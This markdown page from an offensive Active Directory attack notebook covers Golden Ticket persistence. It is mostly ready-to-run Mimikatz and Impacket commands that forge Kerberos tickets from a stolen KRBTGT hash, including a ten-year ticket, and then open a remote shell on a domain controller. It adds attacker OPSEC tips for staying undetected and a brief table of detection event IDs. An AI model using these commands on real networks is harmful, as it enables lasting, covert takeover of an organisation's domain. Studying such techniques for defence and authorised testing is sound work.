attack-64-golden-ticket-persistence.md (3059B)
1 --- 2 title: "Attack #64 β Golden Ticket Persistence" 3 description: "A Golden Ticket provides persistent domain access by forging TGTs using the KRBTGT hash. As a persistence technique (not just one-time escalation), theβ¦" 4 category: active-directory 5 subcategory: "Persistence" 6 tags: ["active-directory", "kerberos", "adcs", "credential-access", "persistence"] 7 tools: ["Impacket", "Mimikatz", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Eight/π€ Attack #64 β Golden Ticket Persistence.md" 11 --- 12 # π€ Attack #64 β Golden Ticket Persistence 13 14 *** 15 16 ## π How It Works 17 18 A Golden Ticket provides **persistent domain access** by forging TGTs using the KRBTGT hash. As a persistence technique (not just one-time escalation), the attacker stores the KRBTGT hash offline and forges new TGTs whenever needed β maintaining access even if the compromised DA account's password is reset. Only a **double KRBTGT password rotation** invalidates existing Golden Tickets. 19 20 *** 21 22 ## βοΈ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **KRBTGT hash** | Previously extracted via DCSync | 27 | **Domain SID** | For ticket crafting | 28 29 *** 30 31 ## π» Full Commands 32 33 ```powershell 34 # ββ Forge Golden Ticket for persistent access βββββββββββββββββββββββββββββββββ 35 mimikatz.exe 36 kerberos::golden /user:Administrator /domain:corp.local \ 37 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 38 /krbtgt:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \ 39 /ptt 40 41 # ββ With 10-year validity ββββββββββββββββββββββββββββββββββββββββββββββββββββ 42 kerberos::golden /user:Administrator /domain:corp.local \ 43 /sid:S-1-5-21-3878595448-1012506728-1948843120 \ 44 /krbtgt:1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \ 45 /startoffset:-10 /endin:43200 /renewmax:86400 /ptt 46 ``` 47 48 ```bash 49 # ββ Impacket β forge and save Golden Ticket βββββββββββββββββββββββββββββββββββ 50 ticketer.py -nthash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d \ 51 -domain-sid S-1-5-21-3878595448-1012506728-1948843120 \ 52 -domain corp.local Administrator 53 54 export KRB5CCNAME=Administrator.ccache 55 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local 56 ``` 57 58 *** 59 60 ## π― OPSEC Tips 61 62 - **Store KRBTGT hash securely** β it's the key to unlimited domain access 63 - **Forge tickets as needed** β don't use a single Golden Ticket continuously 64 - **Use Diamond (#13) or Sapphire (#14) Tickets** for better OPSEC 65 - **Only invalidated by**: KRBTGT password reset **twice** (to clear both current and previous keys) 66 67 *** 68 69 ## π‘οΈ Detection β Event IDs 70 71 | Event ID | Source | What to Look For | 72 |---|---|---| 73 | **4769** | Security Log (DC) | TGS request with no corresponding 4768 AS-REQ | 74 | **4624** | Security Log | DA logon from unexpected source with no prior TGT event | 75 76 *** 77 78 > β **Attack #64 β Golden Ticket Persistence complete.**